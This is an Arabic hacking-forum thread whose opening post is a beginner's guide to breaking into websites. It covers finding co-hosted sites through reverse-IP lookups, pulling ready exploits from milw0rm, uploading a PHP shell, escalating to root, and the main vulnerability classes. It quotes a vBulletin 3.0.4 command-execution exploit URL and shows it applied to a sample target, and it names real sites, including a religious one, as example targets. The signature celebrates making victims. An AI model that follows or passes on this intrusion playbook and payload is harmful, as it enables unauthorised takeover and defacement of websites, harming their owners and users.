حيل في اختراق المواقع

حيل في اختراق المواقع


النتائج 1 إلى 6 من 6

الموضوع: حيل في اختراق المواقع

  1. #1

    Cool حيل في اختراق المواقع



    السلام عليكم ورحمه الله وبركاته
    ]

    اول شي ابري ذمتي و منتديات الفلاقة قدام الله وخلقه من اطفال الشل و اطفال هكر الاجهزه اللي يفكرون الدعوه ارسل باتش وانا برئ منهم اما الله من مايصير من ضلم وتهكم واستغلال اي ثغره واستغلالها في التخريب سواءا كان الموقع تعليمي اسلامي او ماله اي دخل .. والله على ما اقول شهيد .. الا هل بلغت؟؟ اللهم فشهد

    فضلا اقرا هذه الكلمه :اعاهد الله ونفسي ان لا اضر من لا يستحق الضرر لمجرد اثبات النفس او اللعب


    في البدايه حبيت ابين لكم بعض المعلومات واشياء ,, وحبيت اقولكم ان الهكر مو شي صعب او مستحيل مجرد تطبيقك وفهمك وممارستك سوف تصل لمراحل لم تتوقع الوصول اليها ولكن لكل مجتهد نصيب ,,
    ياشباب يمكن ماعندي ذيك الخبره في كتابه المواضيع وطريقه وضع المقدمه وتنسيق الموضوع فإعذروني في ذلك لكن المقصد اني اوصل المعلومه

    اولا بالنسبه لاختراق المواقع فهو كإختراق الاجهزه ,, .؟! نعم انه كإختراق الاجهزه فهو نفس الفكره تقريبا ولكن تختلف الاساليب ,, فهناك بعض الفروقات اللي تجعل هكر المواقع غامض عند البعض ,,

    ولكن على فكره فإن الذي يستطيع اختراق جهاز ممكن ان يخترق موقع يعني لو تعلمت اختراق الاجهزه ثم انتقلت لهكر المواقع فإن هذا سيكون دافع لتبسط المسأله امامك

    ابعطيكم فكره بسيطه ,,
    اختراق الجهاز يتم عن طريق ارسال خادم او باتش او كما اردت تسميته يقوم بفتح منفذ معين وينتضر منك الاتصال لكي تقوم بتحكم بنظام المصاب ,,
    كذلك المواقع نفس الفكره تقدر تضع خادم او باكدور يقوم بنفس الوضيفه يفتح لك منفذ لتتصل وتتحكم بالنظام المخترق .,.
    ولكن لحضه ,,,,,,,,,,,, شوفو الفرق ,, انت في اختراق الجهاز تحتاج للتحايل على الضحيه عشان يفتح الباكدور

    ولكن في المواقع راح تستخدم الثغرات عشان ترمي الباكدور بداخل الموقع وتشغله

    وبالتالي وصلت لنفس الهدف وهو الدخول لنظام .

    طيب يجيني واحد ويقولي كيف اعرف الثغرات ,, اقوله ماعليك الا انك تابع اخر الثغرات في مواقع عرض الثغرات مثل milw0rm وتابع اخر الثغرات وطبقها واذا مافهمت ثغره معينه حطها في
    هههههه الموضوع اللي انا مثبته واسمه طلبات شرح الثغرات وراح اشرح الثغره بالتفصيل ,,

    طيب الحين عرفنا من وين نجيب الثغرات وكيف نتعامل معها ,, ولكن لحضه هناك معلومه لازم تعرفها

    الموقع مساحه على سيرفر يعني
    السيرفر يحتوي العديد من المواقع مثلا سيرفر العاصفه هوست عليه موقع العاصفه وموقع المشاغب وموقع اسلاميات وموقع الشيعه دوت كم
    انت تريد ان تصل الى موقع الشيعه وتسيطر عليه ,,

    اول شي تروح لموقع http://whois.***hosting.info

    وتضع اسم الموقع بعده like this

    http://whois.***hosting.info/she3ah.com

    بيطلع لك اسم المستضيف والمعلومات ومن والى ,, ومن ضمنها رقم الاي بي اضغط على رقم الاي بي بيطلع لك الموقع اللي على السيرفر مثل كذا
    3asfh.com
    absba.com
    aslamyat.com

    طيب انت فحصت موقع الشيعه ولافيه ثغرات وعرفت المواقع اللي على السيرفر ,,

    انتقل الى المشاغب مثلا وافحصه والعاصفه واسلاميات بعدها وجدت ثغره في المشاغب مثلا ,,
    ادخل الى هذي الثغره وطبقها طبعا احسن شي اذا كانت كوماند وراح ابين انواع الثغرات بعد شوي

    طبعا صارت الثغره كوماند يعني تتيح لك استخدام الاوامر على السيرفر طبعا بالاوامر ايضا تسحب الشل وهذا هو عقده المبتدئين وهو ملف يقوم بتعامل مع النظام

    يعني مثل الدوس في الوندز ,, مو انت تستطيع التعامل مع الوندز من خلال الدوس ؟؟ يعني تقدر تمسح ملف مثلا وتدخل المستندات وتطلع منها بالاوامر وكل هذا عن طريق الدوس
    نعم هذا مثله في اللينكس يستخدم موجه اوامر ويسمونه الشل و Php***** هو اللي يستخدمونه كثير من الهكر وهو سكربت يتيح لك الدخول للشل حق النظام بدون صلاحيات ,
    طبعا بعد ماتسحب سكربت الشل وتشغله على الموقع راح تحصل نفسك على السيرفر ’,, طبعا هناك طريقتين يا انك تاخذ روت على السيرفر او انك تنتقل للموقع المستهدف مباشره وسأوضح ذلك في دروس متقدمه ,,,
    وبكذا تكون وصلت للموقع المراد طبعا عن طريق الروت يعني عن طريق اكسبلوت معين تسوي له ترجمه وتشغله وانت على الشل ويعطيك صلاحيات الروت يعني المدير في نظام اللينكس ,,


    الان بعد ماعرفنا الفكره العامه وشلون والخدع والحيل الي يتم استخدامها للوصل للهدف بشكل عام بنحاول ندخل شوي ونتعمق في الدرس اكثر....

    طيب نقطه البدايه تقول والله انا انسان مبتدئ ولا اعرف اسوي شي قدامي ذا الموقع ابي اخترقه وش اسوي؟؟
    ماراح اقولك مثل باقي المواضيع رح دور ثغرات واخترقه ومدري ايش لا خلونا ناخذها خطوه خطوه بالاسهل فالاصعب ,,

    طبعا حدد الهدف
    الهدف= اختراق الموقع
    سواءا بتغير الصفحه الرئيسيه ولا دخول للمنتدى واختراقه ولا الدخول للشل والاستفاده من السيرفر كامل...

    بعد ماتفتح الصفحه الرئيسيه تفصحه بعينطك مايحتاج تروح تجيب برامج سكان ومدري ايش الا اذا كنت تحب برضو مايمنع اخي العزيز لانه الانسان ممكن ينسا شي او يمر عليه شي

    قبل لا ابدا في النقطه الجايه بوضح لكم حاجه
    الثغرات انواع وتختلف خطورتها ,,
    اول شي في حاجه اسمها ريموت يعني عن بعد ويسمونها remot وهذا اخطر من الوكال , وهذا النوع يقصد به التحكم عن بعد وانت على جهازك تشغل الثغره وتحط اي بي الموقع او ايا كان شكل او طريقه عمل الثغره راح تستغل معك

    والوكال تكون وانت محلي على السيرفر ويسمونها local , اما هذا النوع ويقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر

    وهناك انواع من الثغرات

    SQL Injection Exploit
    Command Execution Exploit
    Local File Include Exploit
    Buffer Overflow
    Denial of Service Exploit


    وهناك العديد ايضا منها اضافه ادمن او دخول بدون باسورد وممكن تندرج تحت السكل انجكشن ,,
    طبعا سناخذ الثغرات اللي فوق وافصلها لكم,
    1/SQL Injection Exploit
    وهذا النوع من الثغرات يعتبر او لا اريد ان اصنفه احسن لانه ممكن استخدامه في امور اخرى ولكنها لم تنشر بعد ,, هذا النوع يتعامل مع قواعد البيانات دائما اي انه يستغل اخطاء البرمجه للدخول لقاعده سواءا لقرائه محتويات منها او للكتابه بداخل القاعده كالتعديل على محتوياتها او اضافه ادمن ,, او لو تذكرون ثغرات في vb ثغره هاك الالعاب واخر عشره مواضيع هذي من النوع هذا زي ماشفتو يدخل للقاعده عن طريق استعلام معين ويطلع الباسورد يعني استطاع ان يدخل للقاعده وكلكم عارفين ان قاعده البيانات تحتوي حاجات مهمه مثل عنوان بريدات كل الاعضاء والباسوردات وغيرها .

    2/Command Execution Exploit
    هذا احسن نوع عندي وافضله ويفضلونه الكثير من الهكر , وظيفه هذا النوع من الثغرات يعطيك شل على السيرفر او الموقع المستهدف ويحتوي هذه الثغره , وتقدر من بعدها التحكم وسحب سكربت شل php***** الى الموقع والتعامل مع الموقع كنك تعدل على جهاز وندز وعلى حسب الصلاحيات اذا كان لك صلاحيات معناه تقدر تعدل وتمسح وتسوي كل شي واذا كنت no**** احسن واحسن حيث انك تقدر تستعرض المواقع اللي على السيرفر وتتنقل بينها

    3/Local File Include Exploit
    هذا النوع شبيه باللي قبل يعطيك شل من خلال اضافه رابط الشل حقك ويكون بمتداد gif مثلا او txt وتقدر تطبق الاوامر

    4/Buffer Overflow
    هذا النوع قوي جدا سواءا في المحلي اللوكال ولا الرموت لانه يسوي طفح للذاكره ويغرقها الى ان يحول صلاحياتك الى مدير النظام

    5/Denial of Service Exploit
    هذا تقدر تقول سخيف شوي ,, لكن بما انها ثغره نحترمها
    ووظيفتها حجب الخدمه يعني مثل اللي صار في موقع المجله الدنماركيه يستغل ضعف ويغرق النظام الي ان يعطل الموقع عن العمل ويسمونه (هجوم حجب الخدمه) DoS

    الحين فهمنا انواع الثغرات ,,

    لنفرض اسم الموقع المستهدف اسمه www.admin.com
    بعد ماتشوف الصفحه الرئيسيه وهي عباره عن
    منتدى -سجل زوار -البوم صور - بطاقات مكتبه برامج -مجله -البوم شعر

    ناخذه وحده وحده

    1: المنتدى/ تروح تشوف وش اصداره ونوعه على طول ,

    مثلا صار هذا النوع : vBulletin Version 3.0.4

    طيب تروح لمواقع الثغرات وانصحكم بهذا
    www.milw0rm.com
    لانه يحط الثغرات بستغلالتها جاهزه
    وتبحث عن ثغرات هذا الاصدار سواءا بزر البحث فوق او عن طريق الدخول الا ثغرات السكربتات وبعدها اختار vBulletin وشف الاصدار اللي تبيه له ثغرات ولالا
    طبعا بتحصل من الثغرات الموجوده لهذا الاصدار فيه ثغره

    الان بعد ماضغط على زر الثغره راح يطلع لك التالي عاد على حسب الثغره بالبيرل ولا بال php ولا مكتوب الاستغلال على طول من المتصفح كلها شرحتها في مواضيع مثبته بالقسم , راح يطلع الكود التالي

    كود PHP:
    Exploit
    ---------------- 
    http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 

    Conditions
    ---------------- 
    1st condition     $vboptions['showforumusers'] == True the admin must set 
                showforumusers ON in vbulletin options


    2nd condition     $bbuserinfo['userid'] == you must be an visitor/guest

    3rd condition     $DB_site->fetch_array($forumusers) == True when you 
                visit the forums
    it  must has at least one user show the forum

    4th condition     magic_quotes_gpc must be OFF 

    SPECIAL condition 
    you must bypass unset($GLOBALS["$_arrykey"]) code in 
                init
    .php by secret array GLOBALS[]=;))) 

    # milw0rm.com [2005-02-14] 
    طيب وش معناه الكلام ذا ؟!,,
    يقولك ان الثغره تستغلها عن طريق اضافه الرابط هذا

    كود PHP:
    http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 
    [/PHP]
    وتحط بدال site الموقع المستهدف ومعطيك شروط لاشتغال الثغره بس انت ماعليك منه رح طبق وشف وش يصير طبعا مو شرط تستخدم هذي الثغره فقط كل موقع او كل اصدار وثغراته

    طيب نروح للمنتدى ونكتب وراه الكود اللي عطانا
    مثل ماقلنا اول انه فرضا اسم الموقع www.admin.com والمنتدى لنفرض انك ضغطت على رابط المنتدى وصار اسم المجلد vbيعني صار الرابط
    www.admin.com/vb
    نضيف الرابط بعده

    كود PHP:
    http://www.admin.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')." 


    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

    الهكر لا يرحم المغفلين



    صفحتي على الفيس بوك


    Dr.Virus

    منتداي

    مجموعة الفيروسات


  2. #2
    هكر متألق الصورة الرمزية Iraqe Hacker
    تاريخ التسجيل
    Jul 2012
    الدولة
    Iraqe Hacker™ ✔©Page&Official®Mafia █║▌│█│║▌║││█║▌║▌║
    المشاركات
    3,254

    افتراضي رد: حيل في اختراق المواقع

    تسلم اخي على النقل بس موقع milw0rm
    انقرض قبل عالم الداينصورات
    راجع الروابط جيد بارك الله فيك

  3. #3

    افتراضي رد: حيل في اختراق المواقع

    الشكر الجزيل لك

  4. #4

    افتراضي رد: حيل في اختراق المواقع

    Thanks mY bRO

  5. #5

    افتراضي رد: حيل في اختراق المواقع

    اعتقد انه شرح او نقل كلهم كويسين برافو عليك شكرا لك

  6. #6

    افتراضي رد: حيل في اختراق المواقع

    بارك الله فيك
    لـتـوآصل
    skype: lulz.tn
    صفحتنا في ألفيس بوك


المواضيع المتشابهه

  1. تحميل برنامج اختراق المواقع2013 ,هكر المنتديات الجديد2013 ,اختراق المواقع 1434ه
    بواسطة قهر اليهود في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 8
    آخر مشاركة: 05-11-2013, 07:16 PM
  2. تحميل برنامج اختراق المواقع ,هكر المنتديات المميز ,اختراق المواقع 2013-2014
    بواسطة قهر اليهود في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 14
    آخر مشاركة: 04-21-2013, 04:24 PM
  3. معلومات اساسية وتفاصيل عن المواقع تساعد في اختراق المواقع
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 11-16-2011, 01:37 PM
  4. درس في اختراق المواقع
    بواسطة xVx في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 7
    آخر مشاركة: 11-21-2010, 06:13 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •